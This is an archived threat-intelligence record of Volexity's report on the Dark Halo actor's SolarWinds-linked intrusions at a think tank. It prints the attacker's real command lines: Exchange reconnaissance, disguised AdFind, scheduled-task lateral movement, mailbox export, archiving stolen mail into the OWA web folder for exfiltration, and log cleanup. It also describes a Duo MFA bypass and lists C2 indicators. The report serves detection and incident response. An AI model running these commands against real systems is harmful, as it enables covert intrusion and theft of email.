{
	"id": "2ff418d3-28bc-4b7c-8242-fa211eb09a28",
	"created_at": "2026-04-06T00:18:08.875776Z",
	"updated_at": "2026-04-10T03:37:32.830176Z",
	"deleted_at": null,
	"sha1_hash": "038a84ed65cb51ecb3a435dbfc4e793d7789dde6",
	"title": "Dark Halo Leverages SolarWinds Compromise to Breach Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 837924,
	"plain_text": "Dark Halo Leverages SolarWinds Compromise to Breach Organizations\r\nBy mindgrub\r\nPublished: 2020-12-14 · Archived: 2026-04-05 16:44:04 UTC\r\nVolexity is releasing additional research and indicators associated with compromises impacting customers of the SolarWinds Orion software platform. Volexity has also published a guide for responding to the SolarWinds breach, and how to detect, prevent, and remediate this supply chain attack.\r\nOn Sunday, December 13, 2020, FireEye released a blog detailing an alleged compromise to the company SolarWinds. This compromise involved a backdoor being distributed through an update to SolarWinds’ Orion software product. FireEye attributed this activity to an unknown threat actor it tracks as UNC2452. Volexity has subsequently been able to tie these attacks to multiple incidents it worked in late 2019 and 2020 at a US-based think tank. Volexity tracks this threat actor under the name Dark Halo.\r\nAt one particular think tank, Volexity worked three separate incidents involving Dark Halo. In the initial incident, Volexity found multiple tools, backdoors, and malware implants that had allowed the attacker to remain undetected for several years. After being extricated from the network, Dark Halo then returned a second time, exploiting a vulnerability in the organization’s Microsoft Exchange Control Panel. Near the end of this incident, Volexity observed the threat actor using a novel technique to bypass Duo multi-factor authentication (MFA) to access the mailbox of a user via the organization’s Outlook Web App (OWA) service. Finally, in a third incident, Dark Halo breached the organization by way of its SolarWinds Orion software in June and July 2020.\r\nThe primary goal of the Dark Halo threat actor was to obtain the e-mails of specific individuals at the think tank. This included a handful of select executives, policy experts, and the IT staff at the organization. Volexity notes its investigations are directly related to the FireEye report based on overlap between command-and-control (C2) domains and other related indicators such as a backdoored server running SolarWinds Orion.\r\n
Major Incidents\r\nVolexity has worked three major incidents involving the Dark Halo threat actor. In most cases, the actor aimed to live off the land, primarily focusing on weekly operations to extract e-mail messages from the organization. Dark Halo did use malware and red-teaming tools but largely only for specific one-time tasks as a fallback mechanism when other avenues of access were cut off. For the purposes of this write-up, Volexity will share novel and useful information from the second and third incidents. The second incident involved a sophisticated way to obtain unauthorized access to an account via OWA that had MFA protection in place. The third incident involved a breach by way of the SolarWinds Orion platform.\r\n
Bypassing Multi-Factor Authentication\r\nToward the end of the second incident that Volexity worked involving Dark Halo, the actor was observed accessing the e-mail account of a user via OWA. This was unexpected for a few reasons, not least of which was that the targeted mailbox was protected by MFA. Logs from the Exchange server showed that the attacker provided username and password authentication like normal but was not challenged for a second factor through Duo. The logs from the Duo authentication server further showed that no attempts had been made to log into the account in question. Volexity was able to confirm that session hijacking was not involved and, through a memory dump of the OWA server, could also confirm that the attacker had presented a cookie tied to a Duo MFA session named duo-sid.\r\nVolexity’s investigation into this incident determined the attacker had accessed the Duo integration secret key (akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the duo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined it to be valid. This allowed an attacker with knowledge of a user account and password to completely bypass the MFA set on the account. It should be noted this is not a vulnerability with the MFA provider; it underscores the need to ensure that all secrets associated with key integrations, such as those with an MFA provider, are changed following a breach. Further, it is important that not only are passwords changed after a breach, but that passwords are not set to something similar to the previous password (e.g., Summer2020! versus Spring2020! or SillyGoo$e3 versus SillyGoo$e2).\r\n
SolarWinds\r\nIn the third incident, which took place in July 2020, Volexity identified suspicious administrative commands and ActiveSync anomalies in the organization’s Exchange environment. Further review of the organization’s endpoint software and network traffic confirmed a breach. The attacker had executed commands to export e-mail for specific users in the organization, and then exfiltrated the data via the organization’s Outlook Web Anywhere (OWA) server.\r\nMany of the technical details regarding the malware used are covered in the FireEye notification. However, in this blog, Volexity can share examples of command-line actions the attacker took after gaining access to the target network and provide insight into additional tools, infrastructure, and attacker objectives.\r\n
Reconnaissance\r\nThe attacker was quite adept with Exchange and immediately listed various organization configuration settings via PowerShell. Below are a few of the operations that the attacker executed.\r\nGet a list of users on the Exchange server and their current role using Get-ManagementRoleAssignment:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command \"Get-ManagementRoleAssignment -GetEffectiveUsers | select Name,Role,EffectiveUserName,AssignmentMethod,IsValid | ConvertTo-Csv -NoTypeInformation | % {$_ -replace '`n','_'} | Out-File C:\\temp\\1.xml\"\r\nRetrieve information about the configured Virtual Directory using Get-WebServicesVirtualDirectory:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command \"Get-WebServicesVirtualDirectory | Format-List\"\r\nThe attacker also made use of a file called sqlceip.exe, which upon first glance might appear as the legitimate version of SQL Server Telemetry Client provided by Microsoft. However, Volexity determined this tool was actually a version of AdFind from joeware.net. AdFind is a command-line tool used for querying and extracting data from Active Directory. During the course of its investigations, Volexity discovered the attacker using AdFind with the following command line:\r\nC:\\Windows\\system32\\cmd.exe /C sqlceip.exe -default -f (name=\"Organization Management\") member -list | sqlceip.exe -f objectcategory=* \u003e .\\SettingSync\\log2.txt\r\n
Lateral Movement\r\nThe attacker used PowerShell to create new tasks on remote machines:\r\n$scheduler = New-Object -ComObject (\"Schedule.Service\");$scheduler.Connect($env:COMPUTERNAME);$folder = $scheduler.GetFolder(\"\\Microsoft\\Windows\\SoftwareProtectionPlatform\");$task = $folder.GetTask(\"EventCacheManager\");$definition = $task.Definition;$definition.Settings.ExecutionTimeLimit = \"PT0S\";$folder.RegisterTaskDefinition($task.Name,$definition,6,\"System\",$null,5);echo \"Done\"\r\nThey also attempted this on a number of machines using schtasks.exe directly. For example:\r\nC:\\Windows\\system32\\cmd.exe /C schtasks /create /F /tn \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" /tr \"C:\\Windows\\SoftwareDistribution\\EventCacheManager.exe\" /sc ONSTART /ru system /S [machine_name]\r\n
Exfiltration\r\nThe attacker exfiltrated e-mail data from targeted accounts using the New-MailboxExportRequest command followed by the Get-MailboxExportRequest command. In this case, the attacker was only interested in mail received this year.\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command \"New-MailboxExportRequest -Mailbox foobar@organization.here -ContentFilter {(Received -ge '03/01/2020')} -FilePath '\\\\\u003cMAILSERVER\u003e\\c$\\temp\\b.pst'\"\r\nThe attacker created password-protected archives on the victim’s OWA server so that they could be exfiltrated via a simple HTTP request.\r\nC:\\Windows\\system32\\cmd.exe /C .\\7z.exe a -mx9 -r0 -p[33_char_password] \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Redir.png\" C:\\Temp\\b.pst\r\nAn example URL for the attacker to collect the exfiltrated data would be:\r\nhttps://owa.organization.here/owa/auth/Redir.png\r\nOn disk, this was located at the following path:\r\n\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\r\nVolexity also saw the attacker stage other exfiltration in another folder on the server located here:\r\n\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\\r\nFinally, the attacker added their own devices as allowed IDs for ActiveSync for a number of mailboxes using Set-CASMailbox:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command \"Set-CASMailbox -Identity \u003cUserID\u003e -ActiveSyncAllowedDeviceIDs @{add='XXXXXXXXXXXXX'}\"\r\n
Attacker Cleanup\r\nAfter successfully exporting mail they wished to steal, the attacker would remove the evidence of the export request using Remove-MailboxExportRequest:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command \"Get-MailboxExportRequest -Mailbox user@organization.here | Remove-MailboxExportRequest -Confirm:$False\"\r\n
Attacker Infrastructure\r\nDuring the July 2020 incident, Volexity observed at least two indicators that overlapped with indicators of compromise posted by FireEye. The organization’s SolarWinds server conducted DGA-style DNS queries under the following subdomain:\r\nappsync-api.us-west-2.avsvmcloud[.]com\r\nThe vast majority of queries were met with SERVFAIL responses. In most other cases, the hostnames resolved to IPs that fell in the ranges 184.72.0.0/16, 20.141.48.0/24, 8.18.144.0/24, and 8.18.145.0/24. However, the critical responses to the organization came by way of CNAME responses that occurred between June 30, 2020, and July 16, 2020. These DNS resolutions returned a CNAME for the domain freescanonline[.]com. In late July, the attacker took advantage of their access and started moving laterally throughout the organization, which will be described a bit later. Most notably, the attacker pushed malware to other systems that beaconed back to the following additional infrastructure:\r\nlcomputers[.]com\r\nwebcodez[.]com\r\nAt the time of the incident (July 2020), the attacker had accidentally configured their servers to be open to the Internet, accepting arbitrary requests on port 80. Since then, the attacker has fixed this issue; however, at the time, Volexity was able to identify a number of C2 addresses based on server profiling.\r\nSpecifically, at the time there were only a handful of servers that responded with the following HTTP headers in the following order:\r\nTransfer-Encoding\r\nConnection\r\nServer\r\nX-Powered-By\r\nDate\r\nThe \"Server\" value also specified IIS10.0, but this header order does not match the order used by IIS 10.0.\r\nBased on this pattern Volexity was able to identify the following IP addresses in July 2020:\r\n13.57.184.217\r\n13.59.205.66\r\n18.217.225.111\r\n18.220.219.143\r\n3.16.81.254\r\n3.87.182.149\r\n34.219.234.134\r\n54.193.127.66\r\n54.215.192.52\r\nThese IPs hosted SSL certificates for the following domains:\r\ndeftsecurity[.]com\r\ndigitalcollege[.]org\r\nfreescanonline[.]com\r\nglobalnetworkissues[.]com\r\nkubecloud[.]com\r\nseobundlekit[.]com\r\nsolartrackingsystem[.]net\r\nthedoccloud[.]com\r\nvirtualwebdata[.]com\r\nNotably, some of these domains were set up prior to the earlier known compromise date published by FireEye, such as solartrackingsystem[.]net, which was assigned its current nameserver in January 2020. Several of the domains also have very long registration histories going back several years. Volexity believes that the attacker obtained these domains through auctions or from registrants after they expired but before they were deleted. This allowed the attacker to use domains with a long history and avoid being detected based on detections tied to a domain being newly registered.\r\n
Conclusion\r\nAt the time of the investigation, Volexity deduced that the likely infection was the result of the SolarWinds box on the target network; however, it was not fully understood exactly how the breach occurred (i.e., whether there was some unknown exploit in play, or other means of access), therefore Volexity was not in a position to report the circumstances surrounding the breach to SolarWinds. The machines involved in this incident had been rebooted several times prior to Volexity’s involvement in incident response efforts, meaning that a great deal of evidence that would have been in volatile memory had been lost.\r\nVolexity believes that Dark Halo is a sophisticated threat actor based on the following characteristics of their attacks:\r\nGenerally, the attacker displayed a reasonable level of operational security throughout the attack, taking steps to wipe logs for various services used and to remove evidence of their commands from infected systems.\r\nThe server profile used to identify the C2 domains was only visible for a snapshot in time; once the attacker likely became aware that their C2 addresses could be identified in this way, they went on to secure their C2 servers further.\r\nDespite an ongoing campaign lasting one year, very few files related to this attacker have made their way to VirusTotal.\r\nDuring the investigation Volexity discovered no hints as to the attacker’s origin or any links to any publicly known threat actor.\r\nTo protect against these attacks, Volexity recommends the following:\r\nLook for traffic to any of the related malicious domains identified in Appendix A.\r\nFollow the advice from SolarWinds in their response to this incident.\r\nUse the signatures provided by FireEye to identify related activity.\r\nEnsure that all secret keys associated with MFA or other sensitive integrations are reset following a breach.\r\nMake sure all credentials in an organization, including service accounts, are reset following a breach and that default passwords or those similar to previous passwords are not used.\r\nIf you run an on-premises Exchange environment, consider adding alerting mechanisms to any EDR solutions for processes using the Exchange Management Shell PowerShell cmdlets listed in Appendix B. This may or may not be a valid detection approach depending on how frequently this is used within your organization.\r\nMore generally, if the Exchange Management Shell is rarely used in a legitimate administrative context, it may be worth investigating any historical use of this shell.\r\n
Appendix A – IP and Domain IOCs\r\navsvmcloud[.]com\r\ndeftsecurity[.]com\r\ndigitalcollege[.]org\r\nfreescanonline[.]com\r\nglobalnetworkissues[.]com\r\nkubecloud[.]com\r\nlcomputers[.]com\r\nseobundlekit[.]com\r\nsolartrackingsystem[.]net\r\nthedoccloud[.]com\r\nvirtualwebdata[.]com\r\nwebcodez[.]com\r\n
Appendix B – Exchange Management Shell PowerShell cmdlets\r\nGet-AcceptedDomain\r\nGet-CASMailbox\r\nGet-Mailbox\r\nGet-ManagementRoleAssignment\r\nGet-OrganizationConfig\r\nGet-OwaVirtualDirectory\r\nGet-Process\r\nGet-WebServicesVirtualDirectory\r\nNew-MailboxExportRequest\r\nRemove-MailboxExportRequest\r\nSet-CASMailbox\r\n
Appendix C – DGA Domain Resolutions\r\nSource: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"
	],
	"report_names": [
		"dark-halo-leverages-solarwinds-compromise-to-breach-organizations"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434688,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/038a84ed65cb51ecb3a435dbfc4e793d7789dde6.pdf",
		"text": "https://archive.orkl.eu/038a84ed65cb51ecb3a435dbfc4e793d7789dde6.txt",
		"img": "https://archive.orkl.eu/038a84ed65cb51ecb3a435dbfc4e793d7789dde6.jpg"
	}
}